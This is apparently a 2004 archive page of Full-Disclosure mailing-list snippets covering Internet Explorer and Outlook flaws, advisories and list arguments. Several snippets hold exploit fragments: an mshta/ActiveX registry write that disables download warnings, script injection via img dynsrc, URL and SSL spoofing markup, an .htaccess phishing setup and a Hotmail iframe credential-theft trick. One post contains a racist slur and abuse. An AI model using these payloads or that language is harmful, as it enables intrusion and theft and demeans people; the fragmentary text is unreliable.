!--
Can Some body tell me what is this?
http://131.215.133.210/view/index.shtml?videos=one
--
It looks like a live web cam [from: http://www.axis.com/index.htm] running
on someone's machine at caltech.edu trying to install a signed .cab named
Axis Media Control from Axis Communications
to
be released, screenshots and a demo movie are available. (A pre-beta
version is available for those willing to help and PROVIDE FEEDBACK!).
Cheers,
Loni
[EMAIL PROTECTED]
http://www.securityforest.com
___
Full-Disclosure - We believe in it.
Charter: http
http://slackware.com/lists/ provides security update lists,
The patches can be found in the /patches dir of the version
your running, including slackware-current.
Colin
Carlos de Oliveira wrote:
Hi there!
I've seen linux distributions sometimes posting here on
full-disclosure it's security
efforts to fully serve the profession
and future ISSAF releases. The feedback form is given at the end of ISSAF;
please email your feedback at [EMAIL PROTECTED] We will get back to you ASAP.
Best regards,
A.D. Moore
___
Full-Disclosure - We believe
Friday, December 10, 2004
Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys
a fairly robust popup blocker.
This little 'thing' has been a major irritation to date. Nothing gets past
it until now. Chatter exists that some sites have defeated it on the
causal
Couldn't agree more, their concern isn't security, but
survival of the business model.
By providing a what you proposed would be a threat to their
profitable model as so
eloquently pointed out by Valdis and many others time and
time again.
-cm
[EMAIL PROTECTED] wrote:
On Mon, 06 Dec 2004 19:29
that this has probobly been fixed in various ways, but I have
old Unixes for just such occasions.
Dave Morgan
David S. Morgan CISSP, CCNP
aka: [EMAIL PROTECTED]
When the winds of change blow hard enough, even the most tiny object
can become a deadly projectile
Monday, November 22, 2004
Thoroughly enjoying the usage of the various electronic greeting cards
going way back when to the days of Blue Mountain, today when the need has
arisen to make usage, horror has been replaced enjoyment by noticing an
ever increasing dwindling of the free cards. To
Since we're going the whole nine yards here, let's toss in the following
as well:
1. This will of course give a different reading in the status bar
2. More importantly it will bypass the so-called 'popup blocker' in IE XP
SP2
It's a hand-made Excel spreadsheet using OWC11 for Office 2003.
Tuesday, October 19, 2004
The following technical exercise demonstrates the enormously
elaborate methods required to defeat the current [as of today's
date] security mechanisms in place in both Microsoft Windows XP
SP2 and Internet Explorer 6.00 SP2 fully
patched:
It is by no means easy.
On Sat, 16 Oct 2004 19:13:18 -0700, Etaoin Shrdlu [EMAIL PROTECTED] wrote:
Of course, anyone still using the term hax0r as though it were
meaningful might want to think further about what a security
professional might be
A security professional is someone who cares more about money than
On Sun, 17 Oct 2004 12:34:33 -0500, Todd Towles
[EMAIL PROTECTED] wrote:
I agree with your idea, but I am one of those uni graduate/20 something
professionals. I am very passion about my work and the security of the
company I work for. I work in a rural state and the money isn't as high
!--
It has recently come to my attention that it is possible to
circumvent functions inside of Microsoft Outlook 2003 and some
other MUA's by using href tags containing cid:;. By default
such MUAs no longer download web referenced images and objects,
however images referencedby cid:;
Yahoo! is the lamest network online corp wise. The queuing up of
security reports and the priority of them is all wrong, me thinks they
are a tad under staffed
I can access admin areaz of Yahoo!, I have various screenshots to prove it.
I gave up contacting Yahoo! after they failed to be
Should Full-Disclosure only allow so-called -real- names? I was on
Nanog (a network admin list) and they have a rule where you can only
post with a first and second name, instead of an alias or nick, to
kind of give more credibility that you are a security professional and
not a hax0r or script
Reverse Engineering the First Pocket PC Trojan
Airscanner Corp. has published a new tutorial on Reverse Engineering
the First Pocket PC Trojan:
http://www.informit.com/articles/article.asp?p=340544
This tutorial shows you how to reverse engineer a new example of Windows
Mobile malware - step by
Surely the threat of Take no Prisoners! is enough to scare anyone off, Harry.
On Fri, 08 Oct 2004 14:09:26 -0400, Harry Hoffman
[EMAIL PROTECTED] wrote:
Umm, should the Paladin of Security have weak locks? ;-)
Compute Fair, Compute Fun, Compute secure
Jan Clairmont Paladin
://airscanner.com/
[EMAIL PROTECTED]
Contributors:
Cyrus Peikari
Seth Fogie
Ratter/29A
Jonathan Read
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
!--
Alla Bezroutchko wrote:
Also interesting that they don't use
a {behavior:url(#default#AnchorClick);}
in this exploit which seems to be an essential part of http-
equiv's and
mikx's exploits.
The key to all this exploits is drag'n'drop access to a local
directory.
Since WinXP SP2
!--
The premise behind this Drag'n'Drop exploit is two-fold, one is
the ability to open a window with local content and the other is
the fact that dropping an IMG element will pass its DYNSRC
attribute instead of its SRC attribute
--
This is amusing. Though you're not the first to conjur
Application: NtRegmon (http://www.sysinternals.com/ntw2k/source/regmon.shtml)
Date: 14/Aug/2004
Status: Patched version available (6.12).
Platform(s): Windows OSs.
Author: Fermín J. Serna [EMAIL PROTECTED]
Location: http://www.ngsec.com/docs/advisories/NGSEC-2004-7.txt
Let's commence by giving credit where credit is due. The
thinking is that the manufacturer of Windows XP has done a
splendid job in patching their little operating system with 300
million dollar's worth of fixes. This is not exactly 'pocket
change'.
But this is:
1. trivial scripting in the
Internet Explorer supports a fantastic variety of styles
and behaviors amongst other 'unique capabilities'. A lovely
demonstration of that can be found here:
http://www.malware.com/wottapoop.html
--
http://www.malware.com
___
: IPD up to 1.4 (http://www.pedestalsoftware.com/)
Date: 14/Aug/2004
Status: Vendor contacted on 14/Aug/2004.
Platform(s): Windows OSs.
Author: Fermín J. Serna [EMAIL PROTECTED]
Location: http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt
Overview
Mr Johnson,
We have made available a paper conatining several (unpublished by
iDefense's paper) tests agains PAX-like solutions in WIN32. Only
tests not deep information on how this products works.
Grab it at: [264 KB]
Recently Idefense has made public the whitepaper[1] called A
Comparison of Buffer Overflow Prevention Implementations and
Weaknesses.
Having reviewed this whitepaper we want to say it makes an inappropiated
comparison on the windows protections, especially with our product
StackDefender[2]
Randal, Phil wrote:
I have to agree with Todd, the naming convention is now right
useless for the normal population and make keeping up with
viruses on a corporate level that much harder. AV companies
are always trying to beat the other company and this leads to
very little information sharing
send it to [EMAIL PROTECTED]
They will forward your mail to the responsible people!
I did it the same way, and had a response within some hours!
/oliver
Jedi/Sector One wrote:
On Fri, Aug 06, 2004 at 05:11:19PM -0400, Michael Scheidell wrote:
Have a vulnerability in an IBM product.
sent alert
: Vulnerability Reported to:
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
* July 9 (Two Hours Later): SuSE's Roman Drahtmueller responds
* July 9: Per SuSE request, issue forwarded to [EMAIL PROTECTED]
* July 19: Initial date set
VX Dude wrote:
named exploits are usefull for finding out what's
inside a named.conf even in chroot jails.
- 2 cents
--- Paul Schmehl [EMAIL PROTECTED] wrote:
Can this be done?
Conditions:
1) You know an IP address that is running a DNS
server. (IOW, it responds
to digs.)
2) You do not know
Xitami Imatix testssi.ssi XSS
=
Xitami is an easy to use and open source webserver, running on several
platforms.
What?
=
Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which
delivers
a website with the content of several SSI-variables.
Within the
Daniel Neugebauer wrote:
Hi!
and wtf is an SEK and can I buy a cup of coffee with
that?
It's the Swedish currency:
http://en.wikipedia.org/wiki/Krona
Exchanged that would be 108,70 EUR or 134,56 US-Dollar. That's not
much for a challenge, is it? ;)
Bye,
Daniel
!--
Maybe the dark hearted criminals have de-faced the mi2g
website?
--
maybe light hearted ones can too. Stick this in the search thing
on the main page. Pretty sad:
''img dynsrc=javascript:document.write
('brbrcenterbfont size=24cmall your digital risk base
belong to
http://www.malware.com/wattadrag.html
--
http://www.malware.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Paul has posted a tantilizing demonstration to bugtraq today.
[see: http://www.securityfocus.com/archive/1/368652]
This Internet Explorer sure provides hours of free
entertainment. Let's install and run executable code on the
target computers for the hell of it. Paul's beautiful demo
!--
Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft
Word 10.2627.3311 launches Notepad.
--
this can be very interesting. The same in Outlook 2003 both html
and rich text. Good thing the named temp file deposits were
magically patched.
As Andreas Sandblad mentioned the
!--
I'm also really curious how this could be exploited.
--
What do you mean: I'm also really curious how this could be
exploited.
it's already been exploited, it was all over the news and
security lists a few months ago.
What is this: eWEEK.com Security Center Editor Is someone
!--
Every bit of real testing I've seen shows this is not a real
vulnerability in IE.
--
surely you jest.
It is the Key to the Kingdom. To quote the original finder, way
back in June of 2003:
allows remote attacker to traverse Shell Folders directories.
A remote attacker is able to
!--
No reason to set the kill bit?
Take a look at
http://seclists.org/lists/fulldisclosure/2004/Jun/0318.html
And I am quoting you now
You should be able to use this to compromise Windows XP SP2
through Internet Explorer despite the My Computer zone hardening
since the Trusted Sites Zone
This is IHCTEAM material. We fuck blackhats and we own the planet.
This is a leet advisory, s0 l33t. Just read it and be quiet.
---
IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr. [EMAIL
PROTECTED]
Product: PHP
Version: all
Security
?
=;^)
On or about 2004.07.02 02:52:05 +, [EMAIL PROTECTED]
([EMAIL PROTECTED]) said:
Hey how nice, WindowsUpdate/WellsFargo magically appeared in
front of
me and I didn't even intend to go there .. I was just surfing
for porn
.. Let me hurridly download some stuff from there and give it
my
account
!--
The real fault doesn't belong with individual components
(ADODB.Stream included), and I think the almost rant-like posts
of Drew Copeley and HTTP-EQUIV miss this fact. ADODB.Stream
does *not* represent a vulnerability, although it does act to
significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It's
still have to contend with mshta.exe calling out through the
iframe and more than likely firewalled long ago, so use it to
write the registry to kill the download warning, then use it set
the browser home page as http://www/foo.exe, that or the
default search engine.
tons of
browsers are not affected:
* Mozilla Firefox 0.9 for Windows
* Mozilla Firefox 0.9.1 for Windows
* Mozilla 1.7 for Windows
* Mozilla 1.7 for Linux
http://secunia.com/advisories/11978/
Perhaps someone who really knows will enlighten us all.
Thor Larholm [EMAIL PROTECTED] said:
From: [EMAIL
browsers are not affected:
* Mozilla Firefox 0.9 for Windows
* Mozilla Firefox 0.9.1 for Windows
* Mozilla 1.7 for Windows
* Mozilla 1.7 for Linux
http://secunia.com/advisories/11978/
Perhaps someone who really knows will enlighten us all.
Thor Larholm [EMAIL PROTECTED] said:
From: [EMAIL
about that, others...well...you know.
Thor Larholm [EMAIL PROTECTED] said:
Both you and I know perfectly well that Windows Update serves a
different page for non-IE browsers, and that that page does
not contain
any frames. You should focus on the facts instead of letting
your hatred
What an utterly pathetic scenario you present. Obviously you're
blissfully unaware of the current security trend of site
spoofing, 'phishing', url spoofing, DNS spoofing, zone spoofing
and on and on and on.
and of course now very the latest 'security expert spoofing' !
!--
Your subject
On the subject of IE bugs, I am running SP2 RC2,
IE6.0.2900.2149 today I
opened a window
http://www.asus.com/products/server/srv-mb/ncch-dl/overview.htm
In another IE window I had www.ingrammicro.com/uk open
Whe I click on the picture of the motherboard in the first
page to enlarge
Here's a quick and dirty demo injecting malware.com into
windowsupdate.microsoft.com :)
http://www.malware.com/targutted.html
Thomas Kessler was kind enough to inform that this is not new,
but in fact on old issue with Internet Explorer which by all
accounts was supposed to be patched back
Here's a quick and dirty demo injecting malware.com into
windowsupdate.microsoft.com :)
http://www.malware.com/targutted.html
Thomas Kessler was kind enough to inform that this is not new,
but in fact on old issue with Internet Explorer which by all
accounts was supposed to be patched back
With the current (in)security of most (if not all) ISP
that provide ASP.Net or ASP Classic shared hosting
services, all the attakers need to do is to get an
hosting account in a shared hosting server (trivial)
and infect these websites from the inside.
I haven't heard of any new IIS exploit
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
volunteer as an expert witness when the negligence lawsuits
finally arise :)
and you?
Burnes, James [EMAIL PROTECTED] said:
One word,
m-o-n-o-p-o-l-y
And what are you going to do about it, punk?
-Original Message-
From: [EMAIL PROTECTED] [mailto:full-
disclosure
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
ktabic wrote:
On Tue, 2004-06-22 at 15:42 -0400, joe wrote:
ActiveX/OLE/COM is, again, not core Windows. They are applications that run
on Windows. The default user interfaces on the system use these for
management of the system and they are heavily embedded in several user faced
applications
There are several ways to search for vulnerabilities in applications.
If you have the sourcecode, you can do a code review. There are many
tools (like flawfinder etc.) wich will support you in finding static
vulnerabilities like
buffer-overflows du to incorrect usage of commands like strcpy and
Well they can't get a simple thing like a mail client right,
they can't get a semi-simple thing like a browser right, they
can't get not-so-simple thing like an operating system right, so
let's branch out and fuck up some other things.
No doubt a few years from now you'll see a line of food
Tuesday, June 12, 2004
The following courtesy of 'bitlance winter' adds an entirely new
dimension to the matter and also suggest some additional
peculiarities at play:
a href='http://quot;gt;lt;plaintextgt;.e-gold.com'foo/a
a href='http://quot;gt;lt;scriptgt;alert()lt;%
james edwards wrote:
I've just been told that it was a DoS. No details.
Unlikely, Akamai is an overlay network the root content node is not
reachable.
Akamai can in real time spread web traffic through out their global network
of
servers, diluting a DoS to the point it is not significant. It is
This is all incorrect.
1. Any unusual characters in a file name will automatically be
converted to random digits. This has been tested and
demonstrated since 2001.
2. 'Save target' and an invoked download whether automatic or
manually cannot be the same. Simple logic right click on a
15MB
There is a sneaking suspicion that you can put the site contents
in the so-called 'local zone' or 'my computer'.
Since it validates the 'front end' of the address and ends up at
the 'back end' this all would seem very similar to:
object data=ms-its:mhtml:file://C:foo.mhtml!
!--
http://zdnet.com.com/2100-1105-5229707.html
http://news.com.com/2100-1002_3-5229707.html
IE flaws used to spread pop-up toolbar
by Robert Lemos, CNET News, 09 June 2004
The possibility that a group or company has apparently used the
vulnerabilities as a way to sneak unwanted advertising
Thursday, June 10, 2004
The following was presented by 'bitlance winter' of Japan today:
a href=http://www.microsoft.com%2F redir=www.e-
gold.comtest/a
Quite inexplicable from these quarters. Perhaps someone with
server 'knowledge' can examine it.
It carries over the address into the
Let me add some notes to this:
1. Placing microsoft.com in the so-called 'trusted zone', will
render the site contents of e-gold.com in the 'trusted zone'
2. Opera fails, Mozilla functions
3. While it may appear to be related to the html form, the same
can be achieved with a normal href or
From the original discover, 'bitlance winter' one big fat
coelacanth:
a href=http://www.malware.com%2F redir=www.e-gold.comtest/a
i guess that this issue is not e-gold's BUG,
IE6 and Opera7.51 is vulnerable.
Some server's DNS allow magic number subdomainname.
the server allow ,
www.site.tld
We wrap this up with a full-on ssl site spoof. It seems limited
how far you can 'shove' the real domain out of the way, but just
enough to make it convincing so we adapt the window to 'cover'
it up. Interestingly [with apologies to e-gold for playing with
their site], they have a secured
Who exactly are you?
You come barreling into FD several months ago, long after it was
created. Pissing in your pants to have found a unmoderated new
mailing list. You run around on a spree posting every piece
drivel at every possible opportunity. You then latch onto
bugtraq riding the
Monday, June 07, 2004
!--
1. When the product alerts it creates an html file in the
temporary file of the user's machine [the so-called local zone]
[screen shot: http://www.malware.com/weallcar.png 29KB ]
This html file is viewed from an Internet Explorer browser
object and
indicates
!--
I hope I provided you with information to re-think your claims.
--
Is that so?
You and your friend provide nothing. Never have. Never will.
You and he ought remain in the peanut gallery and let doer's do.
Sit back keep your mouth shut and learn from people who do.
Or create yet
a suitable name with suitable
html tags to render as we require. At present the actual browser
and operating system automatically filter this {script.com
becomes _script_.com].
3. We need a container to achieve this and do so like this:
PK
à¸(ÏQhD D img[EMAIL PROTECTED] ](P^)7CC
ph03n1x wrote:
Hello
I'm kinda new to this list and this is my first post so be nice to me :)
Well I got an Intrusion Detection and Prevention System from a quite
famous company which they lend me for betatesting. I already compiled a
few exploits to test and it detected them quite reliable.
Pathetic.
Since you can spoof the main log in site all security calls to
check for the 'little' padlock icon to determine the site is
real doesn't exist on it plus the site has cross-site scripting
capabilities:
http://chase.com/inetSearch/index.jsp?
Anyone on this list have a rogers cable modem connection want
to do a quick test of something, drop me a note.
--
http://www.malware.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Wednesday, May 26, 2004
Many people dismiss the dangers of cross site scripting as
nothing more than 'parlor tricks'. This is not a good idea. As
previously indicated:
[see: http://www.securityfocus.com/archive/1/348363]
when the right circumstance arises, this puny 'parlor trick' can
What kind of rinky-dink operation is this?
Hosted on geocities? Do you suppose they took the $11.95 per
month or the $19.95 or made a big splash and went for the $39.95
per month special. A whopping $25 saving setup fee too.
Broken links everywhere, script errors everywhere, missing
images.
Phriday , May 21, 2004
Several pheeble yet interesting phishing possibilities arise as
phollows:
Take one .htaccess trivially modified to suit the target
scenario:
AuthName EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN
AuthType Basic
One throw-away domain which can include the target's
Georgi Guninski wrote:
On Sun, May 16, 2004 at 12:19:21PM -0700, [EMAIL PROTECTED] wrote:
The MS operating systems are the main source of problems for really only
2 reasons:
1) their popularity makes them the most valuable targets
i suggest you stop smoking bad stuff, it is illegal in bulgaria
hi folks,
i played around with ActiveState's ActivePerl for Win32, and crashed
Perl.exe with the following command:
perl -e $a=A x 256; system($a)
I wonder if this bug isnt known?!? Because system() is a very common
command
Can anybody reproduce this?
I put together a little advisory on my
hi folks,
i played around with ActiveState's ActivePerl for Win32, and crashed
Perl.exe with the following command:
perl -e $a=A x 256; system($a)
I wonder if this bug isnt known?!? Because system() is a very common
command
Can anybody reproduce this?
I discovered this vulnerability
Monday, May 17, 2004
Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email' this can be achieved with the highly
touted 'secure-by-default' Outlook 2003 mail client from the
craftsman known as
Seth Alan Woolley wrote:
On Sat, May 15, 2004 at 08:31:25PM -0400, Shane C. Hage wrote:
Why should Microsoft have more blame?
In my opinion, I believe that software companies, especially Microsoft, have
taken all of the appropriate steps to provide security within their
products.
Keep your head
Thursday, May 13, 2004
The following is exceptionally unusual. For many years post
Outlook Express 4 has been an impossibility to target html or
remote sites directly into the 'window' of an Outlook Express
mail message. That means all links [your basic href] would
invoke the browser
Tuesday, May 11, 2004
Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it. Cursory examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'.
Sunday, May 09, 2004
Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it. Curosry examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'.
Saturday, May 08, 2004
More silliness :
A HREF=http://www.microsoft.com alt=http://www.microsoft.com;
IMG SRC=malware.gif USEMAP=#malware border=0
alt=http://www.microsoft.com;/A
map NAME=malware alt=http://www.microsoft.com;
area SHAPE=RECT COORDS=224,21 HREF=http://www.malware.com;
as everyone could imagine, it's just another lame fake advisory of those
non-skilled bugtraq.org guys.
they always open their mouths very wide.
in former times it was funny to see their mails to mailinglists like bugtraq or
full-disclosure, but nowadays i can just bemoan these lame guys.
!-- This advisory below however is not from Microsoft,--
it is an 'official' Microsoft alert though :(
news://news.microsoft.com/[EMAIL PROTECTED]
not that anyone really cares :)
--
http://www.malware.com
___
Full-Disclosure - We believe
!--
I thought you were already aware of the text/x-scriptlet
object variation of Ibiza which was exploited in the wild before
Ibiza
was even discussed on Bugtraq
--
Really? I be most interested in seeing a reference to that. The
time-line I have is:
1. On Wednesday, February 11, 2004
attacker with access to Monit's WBA via HTTP or HTTPS clients
could potentially gain the privileges of the root user.
V. Vendor Response
April 3, 2004:
* First two vulnerabilities discovered
* Monit team notified via e-mail ([EMAIL PROTECTED])
April 4, 2004:
* Response from Jan Henrik
Someone's thinking [for once].
tehaa = 'ADO' + 'DB' + '.St' + 'ream';
var tehf = new ActiveXObject(tehaa);
--
http://www.malware.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
!--
afaik, i can stop ie 0day exploits by doing these things.
so, i made this:
http://umbrella.name/winblox/
of course, free.
--
This is fantastic. A truly useful effort for the benefit of the
so-called security community. And free. And from security
expert who actually finds new and
!--
GET / HTTP/1.1
HTTP/1.1 200 OK
Server: My Bitchin' IE Infector
Date: Sat Mar 27 13:22:27 2004
Content-type: text/html
Accept-Encoding: identity
Accept-ranges: bytes
snip content
--
reinsert content
object data=ms-its:mhtml:file://C:foo.mhtml!
Dear Lists,
I have completed an analysis of the 'Witty' worm that impacts multiple ISS
products. The worm is spreading via a very simple UDP propagation
algorithm. The unique nature of this worm made it a fascinating piece of
code to analyze. The analysis gets into the details of the worm's
Dear Lists,
I have had an incredible surge in demand following my recent post of the
analysis of the 'Witty' worm. Initially, some of you were able to access
it now, but most of you were not. For those of you who were not able to
obtain a copy, a mirror has been made available. Tremaine Lea
!--
Joe just posted a URL with an analysis:
http://www.lurhq.com/witty.html
--
Certainly there is nothing like an 'early warning HUMAN system'
but really, how about letting the author's of their own work
make these announcements. There appears to be a new trend of
coat-tail riders
...then you're a lazy incompetent fake security fuck waiting
around for the house nigger to serve you your gin and tonic
while you sit on the stoep sipping your gin and tonic.
Mike Barushok [EMAIL PROTECTED] said:
Hmm, seems a little hypocritical to call for only the
author to announce
Thursday, March 18, 2004
Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted buddy.
In order to gain your little pal's credentials, simply send
him or her an email with an extra long subject like so:
=iframe
src=http://www.bloatedcorp.com
input type=hidden name=Biz.Email1
value=[EMAIL PROTECTED]
input type=hidden name=Biz.Email2 value=
input type=hidden name=Biz.Email3 value=
input type=hidden name=Biz.IM value=
input type=hidden name=Biz.WebPage value=
He had taken our entire contact list
1 - 100 of 178 matches
Mail list logo